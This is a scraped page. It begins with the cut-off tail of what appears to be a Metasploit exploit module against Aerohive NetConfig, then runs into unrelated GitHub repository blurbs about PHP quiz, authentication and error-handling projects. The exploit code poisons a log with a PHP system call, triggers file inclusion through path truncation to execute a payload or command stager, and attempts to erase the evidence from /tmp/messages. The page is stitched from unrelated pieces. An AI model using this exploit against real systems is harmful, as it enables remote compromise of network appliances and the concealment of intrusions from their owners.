poison_evidence.include?(@poison_cmd) log_cleaned = true end end rescue StandardError => e print_error("Error during cleanup: #{e.message}") ensure super end unless log_cleaned print_warning("Could not replace the PHP system call '#{@poison_cmd}' in /tmp/messages") end end if log_cleaned print_good('Successfully cleaned up the log by deleting the line with the PHP syscal from /tmp/messages.') else print_warning("Erasing the log poisoning evidence will require manually editing/removing the line in /tmp/messages that contains the poison command:\n\t#{@poison_cmd}") print_warning('Please note that any modifications to /tmp/messages, even via sed, will render the target (temporarily) unexploitable. This state can last over an hour.') print_warning('Deleting /tmp/messages or clearing out the file may break the application.') end end def execute_command(cmd, _opts = {}) print_status('Attempting to execute the payload') send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'action.php5'), 'vars_get' => { '_action' => 'list', 'debug' => 'true' }, 'vars_post' => { '_page' => rand_text_alphanumeric(1) + '/..' * 8 + '/' * 4041 + '/tmp/messages', # Trigger LFI through path truncation @shell_cmd_name => cmd } }, 0) print_warning('In case of successful exploitation, the Aerohive NetConfig web application will hang for as long as the spawned shell remains open.') end def exploit poison_log if target.arch.first == ARCH_CMD print_status('Executing the payload') execute_command(payload.encoded) else execute_cmdstager(background: true) end endend
mu-ki / A Online Quiz Site# Skill's Breaker An online quiz system built on PHP, JS and HTML. It has inbuilt Timer support along with Admin Panel This project is a great improvement of 'Online-Exam-System-' Modified by Mugunthan.K (mugunthkumar99@gmail.com). Since it was licensed under MIT so I think I have rights to improve and re-distribute it. I have again licensed it under MIT. You are free to modify and re-distribute #Added features: 1. Added Timer support. 2. Added control to "Enable" and "Disable" the quiz on the Admin panel 3. Added control to navigate among all the questions of quiz (during the quiz) and finish the quiz whenever the user wants. 4. Added control so that user can start the quiz at any time and continue the quiz even if some error or session timeout occurs. 5. Added control to store the answers to question and show a detailed analysis of the quiz results. 6. Improved GUI of the quiz panel. #Setup: 1. Create a new database in MySQL. 2. Run the SQL query in "quiz.sql". 3. Open the file "dbConnection.php" and change the Server name, Username, Password and Database name. 3. Visit the home page in browser. Use the "Admin Login" link to login to Admin Panel. Default user - 'muki' pass - '1111' #How to Use 1. Use the Admin Panel to set up quiz. Quiz won't be enabled unless you click the "Enable" button. Click on the same to enable an added quiz. 2. Scores are updated realtime on the server, however the leaderboard will be updated only when the user finishes the quiz, or there is a time out or the admin ends the quiz by clicking on "Disable" button. 3. Once the admin clicks on the disable button, the quiz ends for all the users taking that quiz, irrespective of their active or inactive state (whether logged in or left the quiz in the middle only). The leaderboard will be updated either when a user "Finishes" his /her quiz and when the admin "disables" the quiz. 4. Once the quiz is disabled, the quiz becomes inaccessible. If the quiz is enabled again later, only those user who have not already taken the quiz can take the quiz. 5. It is recommended that you Enable the quiz when all the users are ready and disable the quiz when all the users have completed the quiz or time limit of taking the quiz has exceeded. #Bugs: 1. Too many SQL queries, needs optimization. Yet not suitable for more than 200 simultaneous user. 2. Security issues, need to sanitize the URL queries.
jpauli / PHP Pattern ObserverSPL PHP Patterns for Error Handling
agungsugiarto / Codeigniter4 WhoopsWhoops PHP Errors For CodeIgniter4.
onassar / PHP JSON ValidationJSON-based PHP validation classes that provide general error-handling/rule-checking, as well as advanced error-funnelling. Centered around the concept of validation-schemas.
devgeniem / Better Wp Db ErrorBetter WordPress db-error.php page with nice wp-cli integration
Iqbolshoh / Php Auth System🔐 PHP Auth System – Simple. Secure. Smart. A clean & secure user authentication system built with PHP + MySQL. ✅ Register 👤 | 🔑 Login | 🔓 Logout | 🛡️ Session Control | 🔒 Hashed Passwords | ⚠️ Error Handling Perfect for any web app needing reliable user access management! 🚀
cytopia / Check Php[sh] Nagios plugin for PHP to check for startup errors, missing modules, wrong php.ini configurations and PHP updates.
nrocco / Vim PhplintCheck PHP files for syntax errors
freddiefrantzen / E2exPHP error handler
uncovery / Xmpp ErrorA lightweight PHP error reporting and tracking tool using XMPP/Jabber messages
coinpaprika / Dexpaprika SDK PhpOfficial DexPaprika PHP SDK: Access multi-chain DEX data, token prices, and liquidity pools with advanced caching and error handling.
42lan / Snow Crash❄ This project is an introduction to cyber security. Snow Crash will make me discover security in various sub-domains, with a developer-oriented approach. I will become familiar with several languages (ASM/Perl/PHP…), develop a certain logic to understand unknown programs, and become aware of problems linked to simple programming “errors”.
bugsnag / Bugsnag SilexThe BugSnag middleware for Silex. Monitor and report errors in your Silex PHP apps.
